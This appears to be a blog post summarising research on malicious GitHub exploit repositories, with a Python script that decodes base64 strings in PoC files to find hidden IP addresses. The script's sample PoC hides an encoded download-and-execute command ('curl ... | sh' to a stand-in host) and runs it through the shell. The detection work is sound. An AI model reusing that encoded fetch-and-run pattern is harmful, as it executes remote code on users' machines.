In "Beyond the Surface", a timely research paper on malicious GitHub repositories, it was revealed that some repositories are intentionally malicious and are publicly uploaded by the repository owner. The researchers downloaded and studied 47,313 GitHub repositories for malicious files; 4893 were malicious. In some, the attackers were trying to plant malware on users' machines, while in others they tried to open backdoors using Cobalt Strike. This research is particularly relevant in the current cybersecurity landscape.
The researchers meticulously collected a detailed dataset in order to
analyze all PoCs on GitHub written for specific CVEs, using the GitHub API,
which provides keyword-based search over repositories, code, and
commits. They also painstakingly examined the contents, source code, and
associated documentation of these repositories to verify whether they contained
PoCs for CVE exploits.
In the 21st century, there are many tactics for exploiting vulnerabilities in web applications, operating systems, network security,
etc. Whether on a small website or a larger online platform, all data are
handled by programs written in programming languages. Cyber attackers exploit current
vulnerabilities to inject malware, attack scripts, and shellcode. GitHub is
no exception: its users rely on many repository code templates for programming, website
development, etc. The aim of this blog post is to describe how the researchers
analyzed their collected dataset using Base64 analysis.
A table of the programming languages used in the repositories shows that
Python has been the dominant programming language among hackers and
exploit developers over the past five years.
Base64 analysis: Base64 encoding is another prevalent way of concealing
malicious payloads, and searching for it is therefore a useful detection method. The
researchers extracted base64 values using regular expressions, analyzed them, and
decoded the hidden scripts to detect any connections to IP addresses within the
encoded payloads. During the analysis, they first ran an automated search for
base64 payloads in the PoCs using the following regular expression (the quantifier
applies to the parenthesized group of four base64 characters, so the pattern matches
any number of complete 4-character blocks followed by a final block with 0, 1 or 2
padding characters):
([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{4}|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)
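As an added example (not code from the paper or from this blog), here is how a defender can run that search over a PoC file, strictly decode each match, and report any decoded payload that names an IPv4 address. The minimum match length, the constructed sample PoC text and the helper names are this example's own assumptions.

```python
import base64
import binascii
import re

# The paper's regex, with non-capturing groups and a minimum of 4 leading quads
# (20+ chars) so that short incidental alphanumeric runs are skipped; the minimum
# length is an assumption of this example, not part of the original expression.
BASE64_RE = re.compile(
    r"(?:[A-Za-z0-9+/]{4}){4,}(?:[A-Za-z0-9+/]{4}|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)"
)
# Dotted-quad IPv4 addresses inside a decoded payload.
IPV4_RE = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")

# Constructed sample PoC: a long identifier (a false positive for the regex) and a
# base64 string that hides a download-and-execute command pointing at a host
# (192.0.2.10 is a documentation address, chosen for the sample).
SAMPLE_POC = """#!/usr/bin/env python3
import base64, subprocess
ExploitPayloadBuilderClassName = "cve-poc"
payload = "Y3VybCBodHRwOi8vMTkyLjAuMi4xMC9zdGFnZSB8IHNo"
subprocess.run(base64.b64decode(payload), shell=True)
"""


def extract_base64_candidates(text):
    """Return every substring of text that matches the base64 pattern, in order."""
    return [m.group(0) for m in BASE64_RE.finditer(text)]


def decode_candidate(candidate):
    """Strictly decode a candidate; None if it is not valid base64 or not UTF-8 text."""
    try:
        raw = base64.b64decode(candidate, validate=True)
        return raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def find_hidden_ips(text):
    """Return (encoded, decoded, [ips]) for each blob whose plaintext names an IPv4 address."""
    findings = []
    for cand in extract_base64_candidates(text):
        decoded = decode_candidate(cand)
        if decoded is None:
            continue  # identifier-like runs and binary blobs drop out here
        ips = sorted(set(IPV4_RE.findall(decoded)))
        if ips:
            findings.append((cand, decoded, ips))
    return findings


if __name__ == "__main__":
    for encoded, decoded, ips in find_hidden_ips(SAMPLE_POC):
        print(f"{encoded[:20]}... -> {decoded!r}  IPs: {ips}")
```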